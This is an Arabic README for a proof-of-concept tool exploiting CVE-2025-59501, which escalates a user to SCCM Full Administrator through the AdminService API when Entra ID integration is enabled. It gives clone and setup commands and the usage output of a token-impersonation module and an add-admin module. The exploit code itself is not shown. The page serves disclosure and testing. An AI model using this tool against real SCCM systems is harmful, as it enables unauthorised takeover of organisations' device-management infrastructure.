
كود POC لـ CVE-2025-59501
إثبات مفهوم (POC) يستغل واجهة برمجة تطبيقات AdminService في SCCM عند تفعيل تكامل Entra ID لرفع الصلاحيات إلى مسؤول كامل (Full Administrator) والاستيلاء على التسلسل الهرمي لـ SCCM. يمكن العثور على مزيد من التفاصيل في هذه المدونة
git clone https://github.com/garrettfoster13/CVE-2025-59501.git
cd CVE-2025-59501/
uv sync
تتكون الأداة من وحدتين: token وadmin
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py
usage: poc.py [-h] {token,admin} ...
POC to abuse CVE-2025-59501 by @unsigned_sh0rt
positional arguments:
{token,admin}
token Get AdminService access token
admin Add user as SCCM admin
options:
-h, --help show this help message and exit
تُستخدم وحدة token لطلب رمز وصول (access token) كمستخدم entra/AD بمعرّف UPN تريد انتحاله
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py token -h
usage: poc.py token [-h] -u USERNAME [-p PASSWORD] -c CLIENT_ID -t TENANT_ID [-s SCOPE]
options:
-h, --help show this help message and exit
-u, --username USERNAME
username
-p, --password PASSWORD
password
-c, --client-id CLIENT_ID
azure app clientid
-t, --tenant-id TENANT_ID
entra tenant ID
-s, --scope SCOPE resource URI/Scope
تستخدم وحدة admin رمز الوصول للمصادقة على واجهة AdminService API لإضافة حساب مستخدم مستهدف كمسؤول SCCM
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py admin -h
usage: poc.py admin [-h] -t TARGET -u USER -s SID -a ACCESS_TOKEN
options:
-h, --help show this help message and exit
-t, --target TARGET target SMS provider FQDN or IP address
-u, --user USER Username to add as admin
-s, --sid SID New admins user's SID
-a, --access-token ACCESS_TOKEN
AdminService access token